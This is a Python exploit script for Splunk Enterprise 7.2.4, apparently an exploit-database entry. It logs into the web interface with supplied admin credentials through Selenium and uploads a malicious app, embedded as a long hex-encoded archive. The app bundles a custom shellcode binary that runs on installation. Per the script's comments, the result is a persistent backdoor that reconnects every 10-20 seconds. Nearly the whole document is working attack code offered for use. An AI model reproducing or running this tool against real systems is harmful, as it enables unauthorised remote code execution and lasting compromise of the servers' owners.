Splunk Enterprise 7.2.4 Remote Code Execution

`#!/usr/bin/python  
  
# Exploit Title: Splunk Enterprise 7.2.4 Custom App RCE (persistent backdoor - custom binary payload)  
# Date: March 1, 2019  
# Exploit Author: Matteo Malvica   
# Original Author: Lee Mazzoleni  
# Vendor Homepage: https://www.splunk.com/  
# Software Link: https://www.splunk.com/en_us/download/splunk-enterprise.html  
# Version: 7.2.4  
# Tested on: kali 4.18.0-kali2-amd64  
# CVE : n/a  
  
# NOTES: Due to python interoperability issue on CentOS, I have upgraded the exploit to  
# support any kind of binary or payload so the exploit does not have to rely on any python libraries  
  
from selenium import webdriver  
from selenium.webdriver.common.keys import Keys  
from time import sleep  
from sys import stdout,argv  
from os import getcwd,path,system  
from subprocess import Popen  
import os  
import stat  
import binascii  
  
# Download and unpack the correct version for your OS from here: github.com/mozilla/geckodriver/releases  
gecko_driver_path = '/root/Desktop/geckodriver'  
  
def checkLogin(url):  
if '/login' not in url and '/logout' not in url:  
print 'Login successful!'  
else:  
print 'Login failed! Aborting...'  
exit()  
  
  
def checkUrl(url):  
if '_upload' not in url:  
print '[-] Navigation error, aborting...'  
exit()  
  
  
def exploit(splunk_target_url, splunk_admin_user, splunk_admin_pass):  
print '[+] Starting bot ...'  
profile = webdriver.FirefoxProfile()  
profile.accept_untrusted_certs = True  
driver = webdriver.Firefox(firefox_profile=profile, executable_path=gecko_driver_path)  
  
print '[*] Loading the target page ...'  
driver.get(splunk_target_url)  
sleep(1)  
  
stdout.write('[*] Attempting to log in with the provided credentials ... ')  
username_field = driver.find_element_by_name("username")  
username_field.clear()  
username_field.send_keys(splunk_admin_user)  
sleep(1)  
  
pw_field = driver.find_element_by_name("password")  
pw_field.clear()  
pw_field.send_keys(splunk_admin_pass)  
pw_field.send_keys(Keys.RETURN)  
sleep(3)  
  
current_url = driver.current_url  
checkLogin(current_url)  
  
url = driver.current_url.split('/')  
upload_url = url[0] + '//' + str(url[2]) + '/' + url[3] + '/manager/appinstall/_upload'  
print '[*] Navigating to the uploads page ({}) ...'.format(upload_url)  
driver.get(upload_url)  
sleep(1)  
  
current_url = driver.current_url  
checkUrl(current_url)  
  
form = driver.find_element_by_tag_name("form")  
input = form.find_element_by_id("appfile")  
input.send_keys(getcwd()+'/'+'splunk-shell.tar.gz')  
force_update = driver.find_element_by_id("force")  
force_update.click()  
submit_button = driver.find_element_by_class_name("splButton-primary")  
submit_button.click()  
  
print '[*] Your persistent shell has been successfully uploaded!'  
print '[*] Be patient, this might take up to a minute...!'  
driver.quit()  
  
  
def generatePayload(shellcode):  
# this hex decodes into the evil splunk app (tar.gz file) that we will be uploading as the payload  
# after the app is written to disk, together with the provided custom shellcode.  
# the app configuration sets it to be enabled upon installation (restarting splunk / manually enabling it is not required.)  
# this is a PERSISTENT backdoor, there is no need to re-upload multiple times... the backdoor will reconnect every 10-20 seconds  
  
# CHANGED: the compressed app folder structure is loading a custom binary from inputs.conf  
print '[*] Creating Splunk App...'  
shell = '1f8b0800e229795c0003ed9c5b6fdbc81580a95c363283b65ea068b7401f06711749dc58e24da4ad34ad9dc44183a6dd20f2260b288a322247126b8a6449cab2374d11f407f4bddbd75efe47db97bef5adfd237def197264eb6ad95959c93ae703a42139c3b99d396766c8e1c4a1d7f577d7e236f3bca27436288a62954a2475cdcc553423730544d50dddd434c3d44ca2a8866ae812299d517e86e8c6098d202b1d9a242c981e0e82359bc7c423ca71e87e438807e55fa817ee57ea952488d83cd380fa300d63bafc556b40fea606f2371543958832cf4c4ce30397bf74f97b57a40b92f44b6a93cf2ae40b22e0d7a425f869f07b003f7ebecf6fe887d85c9e16e5d6cece1371b8dfbf0b793f19d6ffb3d0fe59faaf1a8a628ce87fc9d44aa8ff0b2277b7eba892c4d5392f65ee257972d0bcf88d7141b81ff1f8781c71d8f082069cfdab11ce3dc70882cc1baebb17a586e44a7ea337a8bf9e1b278af29fdc858b972e7f74259f97f3f2b7e45aa51df42a094dbaf15d1a55f9d9639ab41be2782708bcc363da78eab25e7df9bbf7023fa1aecfa2f466d76110e4f933d77782dedda0eb3b7175c0239f5fca2fd5973f79f54a2f29b788baa1bdbe455e59161c435ff1faf552fefb9faa771ebeec1c7cf9eab7af7ff7c7ac14b99c28ce77468af7d551f1f62a91ef057e4b4a8d95744572242635252a75254f4ace6be1478a39520997e15a20d9e0eb0d54c0fffa15f0df7e052cc95797ae7efbead27015d4977f2832fecc7592f60ef3b73db6c7fccfa247346173ab95c19aceaf6c36ff9d166e564de57f70fdc19317dddfffe1ab3ffdf92f7ffddbdfff3152591f8f54d63f87ab63a4a2ce25a260f9abef361b0882bc8770fb4084bb29dc37999b13fe17847b69e09e65e112e16e0af74de6e644b80bc2bd24dcbc7097854b84bb29dc37992b8c564e4c3e7222e59c98a1e4c4038a1c11eee6a98a8c201f0c17336799f7ffdbd3e7ff08829c637297ee57eedf95a6cf74785f4be0f7b27f8334792020c2f2aef813e9282c11eea670df642e0e0410044116cdd0fbbf86eb9fc51a90d3acffb00c85afffb05405d77f2c8221f93bac49bb5e32ef367042f96b9a6a6a4a89cbbf542a6928ff4530247f2fb0e919ac02e37217557352f96b8a89f25f0423f26fc567d001bc85fe2b16eaff4218923f0dc398457b2c9a6f2338bdfc4d552fa1fc17c190fc3b2ca10e4de89c6dc05be8bf85f67f314c967f3a1028f0d379a401f5611ed7ff5b9a35227fcb344c5cffb708aa60f38bae0fa503f90bb71e07ddc86675bbcdecddb8dba9c9d025c46ee0933bc42a68055dee044ee276189cab25a3b4a199d6ba52009d35d761a0a7c8f250acf09fb013c56115f40d5dd7b42c8e9a4c6d9bc53184881875489954c92aa9dd22bdc84d58ff5466fb61102510283e8813d6999dce7a492f6c94544b578ff2da75676710caa7140c553537cca31b3ddaf5a19ea29a1cf47c164160ea745cffa491e99abe7e145948ed5dda62c5b4e2ebcd20aa7743d047169f3873869295eac4f29facff622238270b0019328e5bffafebfab0fe6b60012cd4ff4570522d93ab611484713166bed3a1ae571c57bcbe02f84123700e64796565853c7db8fdacb2b3b5b35d2913be1e0c3ca30ef54817c6993189db41d773488311daf018490262431e20d5b84d23e6903d97f552eb1143fa472727ccf2bbaeda6f0453c6ffbca25d7b4ee3c0d38fff2c433370fcb7088e973f5cf05c1b0e03bf60c7f15ba631c3feeb9aa18dd87fcd3014b4ff8ba0b84aeeb5a9df02ebdb06331c86c40b5a0181110d2b1012b324bdde666eab9d147b7c6d2f81710939801122713b3058b945684c7ad07ab8cbc38614c28029e7c76908b25a940b10f3231ef12b997f3b96c55726861eeedf26e9a534ee325957e04a7aa10183a156c49700974937f26ef4dba4db6915e35d185c1e3eaeceda709d67bcdef0e0b642e8b76e4257b316b110fa13024d2a8bb3fe75226db9cdb1485fcb32d4e04e37f2090cce7891c5fd240c6297eb8debb748d04cbdae55d238c9e3a007d5eb5c1baa6a5e49599ac27ba0ba8aabab72f6d1dd2af9dcb7834e87f999609a81e7053d9e86e7fa2c26377a2ed4fe75c785a8e8c175c23b6d16252e8b6f72994087db4bef4b53e66966d113714399ac75822fd75c9fc7b6067563ef661577e82fbc1a3043dcbdcd2318cb609aef341bbd36ef8e13b69f1c7a9235d21d2c400cfebd805c3f92cb609e89dbe42dedba03a5db85d649862b302bc5485203851a103697f5b599c20eb37833a1a751f296746d50eab11d419573e19324a27e1cc240c54fc65bd75b2708adec240942317911b92e3edc3607bcec03ee05c8877f93a59336ea61e99cbd70e6269d433d5f94740e6dc0bca5236ca1a6f70d5f87462dd75f4b82b0ac1e5ecccca359e2e799d191bb5c3e6d37e68a2df433d56d9fc2bc50981c30bb852c64aab6595afc06eafc1a7a3e423db7e5a7f24e25c54b5a00c1ca6e735254041273fd430372abdf410ce5a10cd5e3b3db503a61f77f0e6374163d8be010e6076d5518353bf082a8bc62e9b45412e679208fa26f80b2beeb1ef27c33fefe87cfeee0608e69cc9aff2b8a3afafcdfd0f0f9df4240f5fab099aaff05756e69bc85fe974cfcfe7f21a0fe7fd84c58ffc3c78c76e01fd7d84fc7acf77fa0fba3fa6feaa8ff0ba12aded2d5e4f4d93ab94398cf1fc63bb25ce52fc5dcb8bee7c62e7f3c7f87a870f1e885975c15efab6af2d80bab34f0bb2e1b329b89eb3fe76c0166e9bf668deabfa55a06eaff22588169f753f16e592d2805455ee93fc8e1137ede0adc56374a5f0190a6eb3150fb31930133ffcc664c594  
bytes = shell.decode('hex')  
f = open('splunk-shell.tar.gz','wb')  
f.write(bytes)  
f.close()  
  
if shellcode == "evil":  
print "shellcode filename needs to be different - please change it"  
exit()  
  
print '\t==> Adding custom shellcode'  
# custom shellcode loading  
with open(shellcode, "rb") as binaryfile :  
evil_bytes = bytearray(binaryfile.read())  
f = open('evil','w')  
f.write(evil_bytes)  
f.close()  
st = os.stat('evil')  
# making the binary executable  
os.chmod('evil', st.st_mode | stat.S_IEXEC)  
decompress_cmd = 'tar zxvf splunk-shell.tar.gz &>/dev/null; rm splunk-shell.tar.gz'  
p = Popen(decompress_cmd, shell=True, executable='/bin/bash')  
p.wait()  
move_cmd = 'cp evil splunk-shell/bin/'  
p = Popen(move_cmd, shell=True, executable='/bin/bash')  
p.wait()  
compress_cmd = 'tar zcvf splunk-shell.tar.gz splunk-shell/ &>/dev/null; rm -r splunk-shell/'  
p = Popen(compress_cmd, shell=True, executable='/bin/bash')  
p.wait()  
if path.isfile('splunk-shell.tar.gz'):  
print '\t==> Payload Ready! (splunk-shell.tar.gz)'  
  
def showUsage():  
print '\n\tScript Usage: {} <targetUrl> <username> <password> <shellcode>'.format(argv[0])  
print '\tExample: {} http://192.168.4.16:8000 admin changeme shellcode.bin\n'.format(argv[0])  
  
if len(argv) != 5:  
showUsage()  
exit()  
  
if not path.isfile(gecko_driver_path):  
print '\n\t[!] This program requires geckodriver, download the corresponding version for your OS from the following link:'  
print '\t\t==> https://github.com/mozilla/geckodriver/releases'  
print '\n\t[!] Extract the geckodriver binary, then add its full path to line 20 of this script.'  
print '\t\t==> gecko_driver_path = "/tmp/geckodriver"\n'  
exit()  
  
splunk_target_url = argv[1]  
splunk_admin_user = argv[2]  
splunk_admin_pass = argv[3]  
splunk_shellcode = argv[4]  
generatePayload(splunk_shellcode)  
exploit(splunk_target_url, splunk_admin_user, splunk_admin_pass)  
`